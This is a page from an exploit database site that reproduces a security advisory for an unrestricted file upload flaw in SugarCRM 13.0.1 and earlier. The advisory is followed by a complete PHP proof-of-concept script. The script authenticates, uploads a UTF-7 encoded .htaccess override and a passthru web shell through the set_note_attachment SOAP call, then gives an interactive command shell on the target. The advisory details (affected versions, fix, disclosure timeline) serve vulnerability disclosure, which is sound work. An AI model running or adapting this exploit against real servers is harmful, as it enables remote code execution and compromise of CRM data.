0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
SugarCRM 13.0.1 Shell Upload Exploit
[-------------------------------------------------------------------------------
SugarCRM <= 13.0.1 (set_note_attachment) Unrestricted File Upload
Vulnerability
-------------------------------------------------------------------------------
[-] Software Link:
https://www.sugarcrm.com
[-] Affected Versions:
Version 13.0.1 and prior versions.
Version 12.0.3 and prior versions.
[-] Vulnerability Description:
When handling the "set_note_attachment" SOAP call, the application
allows uploading of
any kind of file into /upload/ directory. This one is protected by the
main SugarCRM
.htaccess file, i.e. it doesn't allow access/execution of PHP files.
However, this
behavior can be overridden if the subdirectory contains another
.htaccess file.
So, an attacker can leverage the vulnerability to firstly upload a new
.htaccess
file and then to upload the PHP code they want to execute.
[-] Proof of Concept:
https://karmainsecurity.com/pocs/KIS-2023-11.php
(Packet Storm note: POC included at bottom)
[-] Solution:
Upgrade to version 13.0.2, 12.0.4, or later.
[-] Disclosure Timeline:
[23/04/2023] - Vendor notified
[21/09/2023] - Fixed versions released
[06/10/2023] - CVE identifier requested
[26/10/2023] - Publication of this advisory
[-] CVE Reference:
The Common Vulnerabilities and Exposures project (cve.mitre.org)
has not assigned a CVE identifier for this vulnerability.
[-] Credits:
Vulnerability discovered by Egidio Romano.
[-] Original Advisory:
https://karmainsecurity.com/KIS-2023-11
[-] Other References:
https://support.sugarcrm.com/resources/security/sugarcrm-sa-2023-011/
--- KIS-2023-11.php poc ---
<?php
set_time_limit(0);
error_reporting(E_ERROR);
if (!extension_loaded("curl")) die("[+] cURL extension required!\n");
if ($argc != 4) die("Usage: php $argv[0] <URL> <username> <password>\n");
list($url, $user, $pass) = [$argv[1], $argv[2], $argv[3]];
print "[+] Logging in with username '{$user}' and password '{$pass}'\n";
$ch = curl_init();
$params = ["username" => $user, "password" => $pass, "grant_type" => "password", "client_id" => "sugar"];
curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/oauth2/token");
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($params));
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json"]);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
if (($token = (json_decode(curl_exec($ch)))->access_token) == null) die("[+] Login failed!\n");
print "[+] Creating new Notes bean (ID: .htaccess)\n";
$note_id = ".htaccess";
curl_setopt($ch, CURLOPT_URL, "{$url}rest/v10/Notes");
curl_setopt($ch, CURLOPT_HTTPHEADER, ["Content-Type: application/json", "OAuth-Token: {$token}"]);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id]));
if (!preg_match("/$note_id/", curl_exec($ch))) die("[+] Bean creation failed!\n");
print "[+] Creating new Notes bean (ID: sh.php)\n";
$note_id = "sh.php";
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode(["id" => $note_id]));
if (!preg_match("/$note_id/", curl_exec($ch))) die("[+] Bean creation failed!\n");
require_once("./lib/nusoap.php");
$client = new nusoap_client("{$url}soap.php", false);
if (($err = $client->getError()))
{
echo "\nConstructor error: $err";
echo "\nDebug: " . $client->getDebug() . "\n";
die();
}
print "[+] Sending SOAP login request\n";
$params = ["user_auth" => ["user_name" => $user, "password" => $pass]];
$session = $client->call('login', $params);
if ($session['id'] == -1) die("[+] SOAP login failed!\n");
print "[+] Uploading .htaccess through 'set_note_attachment'\n";
$htaccess = "RewriteEngine on\nRewriteBase /upload\nRewriteRule ^(.*)$ - [L]\nphp_flag zend.multibyte 1\nphp_value zend.script_encoding \"UTF-7\"";
$params = ["session" => $session['id'], "note" => ["id" => ".htaccess", "file" => base64_encode($htaccess)]];
$client->call("set_note_attachment", $params);
print "[+] Uploading shell through 'set_note_attachment'\n";
$shell = "+ADw?php passthru(\$_SERVER['HTTP_CMD']); ?>";
$params = ["session" => $session['id'], "note" => ["id" => "sh.php", "file" => base64_encode($shell)]];
$client->call("set_note_attachment", $params);
print "[+] Launching shell\n";
curl_setopt($ch, CURLOPT_URL, "{$url}upload/sh.php");
while(1)
{
print "\nsugar-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
curl_setopt($ch, CURLOPT_HTTPHEADER, ["CMD: ".$cmd]);
($r = curl_exec($ch)) ? print $r : die("\n[+] Exploit failed!\n");
}
# 0day.today [2024-07-05] #